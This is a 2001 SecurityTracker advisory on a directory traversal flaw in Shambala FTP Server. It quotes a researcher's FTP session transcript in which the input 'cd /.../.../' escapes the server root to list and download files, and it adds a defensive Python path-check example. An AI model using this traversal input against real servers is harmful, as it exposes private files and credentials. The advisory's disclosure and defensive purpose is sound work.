Shambala FTP Server Gives Remote Users Access to Any Files on the FTP Server's Drive

SecurityTracker Alert ID: 1001698
SecurityTracker URL: http://securitytracker.com/id/1001698
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jun 7 2001
Impact: Disclosure of system information, Disclosure of user information
Exploit Included: Yes

Description:
A vulnerability has been reported in the Shambala FTP server that allows remote users to access files on the server located outside of the server's root directory.
A remote user can change to any directory and view files.
If a remote user sends the command "CWD ..." (or "cd ..." in the default FTP client), the server changes to a higher-level directory.
A transcript of a demonstration exploit scenario is provided in the Source Message.
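
A path check for the gap the transcript in the Source Message shows, where "cd .." is refused but "cd /.../.../" is accepted. This is an added example, not Shambala's code: naive_cwd is a hypothetical stand-in for a filter that refuses only the literal ".." segment, and safe_cwd, PathRejected, rejected and the sample paths are constructed for illustration.

```python
import posixpath
import re

# Added example; names and sample paths are constructed, not from Shambala.
_DOT_ONLY = re.compile(r"^\.+$")      # "..", "...", "...." and so on
_RESERVED = set(':*?"<>|')            # drive/stream separators, wildcards

class PathRejected(Exception):
    """Raised where the server would answer 550."""

def naive_cwd(cwd, arg):
    """Hypothetical weak filter: refuses only a literal '..' segment."""
    if ".." in arg.replace("\\", "/").split("/"):
        raise PathRejected(arg)
    return posixpath.join(cwd, arg)   # "..." is handed on unchanged

def safe_cwd(cwd, arg):
    """Resolve a CWD argument to a virtual path that cannot leave '/'."""
    arg = arg.replace("\\", "/")
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for seg in arg.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:             # already at the virtual root
                raise PathRejected(arg)
            parts.pop()
        elif _DOT_ONLY.match(seg) or seg != seg.rstrip(". "):
            # dot-only names, or trailing dots/spaces that Win32 path
            # normalization can strip, are never passed to the OS
            raise PathRejected(arg)
        elif any(c in _RESERVED or ord(c) < 32 for c in seg):
            raise PathRejected(arg)
        else:
            parts.append(seg)
    return "/" + "/".join(parts)

def rejected(resolver, cwd, arg):
    """True if the resolver refuses the request."""
    try:
        resolver(cwd, arg)
    except PathRejected:
        return True
    return False

if __name__ == "__main__":
    for arg in ("..", "../", "/.../.../", "Web/docs", "Web/../Web"):
        n = "550" if rejected(naive_cwd, "/", arg) else "ok"
        s = "550" if rejected(safe_cwd, "/", arg) else "ok"
        print(f"{arg!r:14} naive={n:4} safe={s}")
```

The server would join the returned virtual path to its configured root directory, so no client-supplied segment reaches the operating system uninterpreted.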

Impact:
A remote user can traverse the directory tree on the target FTP server and obtain files on the server that are located outside of the FTP server's root document directory.

Solution:
No solution was available at the time of this entry.

Vendor URL: www.evolvable.com/

Cause: Access control error, Input validation error

Underlying OS: Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History: None.

Source Message Contents

Date: Thu, 07 Jun 2001 14:04:57 -0400
Subject: Shambala FTP server Directory Traversal
======================================================================
Shambala FTP server Directory Traversal
Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org
Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d
vicente F0x no rulas weyete!
======================================================================
------------------------=[Brief Description]=-------------------------
Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory and see files to PATH
also GET files remotely.
----------------------------=[Platforms]=------------------------------
Windows 9.x
Windows NT
Windows 2000
-----------------------------=[Summary]=---------------------------------
When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.
Exploit:
alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx
---------- owner group 283 21-maj-01 17:55 index-_-1_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-2_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-3_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-4_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-5_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-6_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-7_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-8_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-9_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-10_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-11_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-12_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-13_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-14_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-15_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-16_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_0_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_0_0_-1.htm
---------- owner group 283 21-maj-01 17:55 .htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-2.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-3.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-4.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-5.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-6.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-7.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-8.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-9.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-10.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-12.htm
---------- owner group 283 21-maj-01 18:08 index-_0_-1_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_1_0_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_-1_0_-11.htm
226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>
EXPLOIT... ...
ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 15444 04-maj-01 14:26 SCAN.log
---------- owner group 140340 04-maj-01 14:05 MAILS-PRESIDENCIA.txt
---------- owner group 466944 18-sep-99 09:32 Shambala.exe
---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG
---------- owner group 31 21-maj-01 17:50 passwordsxxx.txt
d--------- owner group 0 21-maj-01 17:50 Web
226 Transfer complete.
ftp>
ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 246928 18-jan-01 13:10 N6Setup.exe
d--------- owner group 0 18-jan-01 15:39 Netscape 6
d--------- owner group 0 18-jan-01 14:50 Netscape 6 Setup
---------- owner group 3209110 19-jan-01 10:51 getrgt.exe
.
.
.
.
.
---------- owner group 168 21-maj-01 19:07 raza-alt3kx.txt
ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.
alt3kx@machine:/tmp$ cat raza-alt3kx.txt
Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>
alt3kx@machine:/tmp$
-------------------------------=[Patch]=------------------------------
The recommended action is to change the permissions or define
individual directory for users anonymous with files not compromise.
-------------------------=[Company Compromise]=-----------------------
http://www.evolvable.com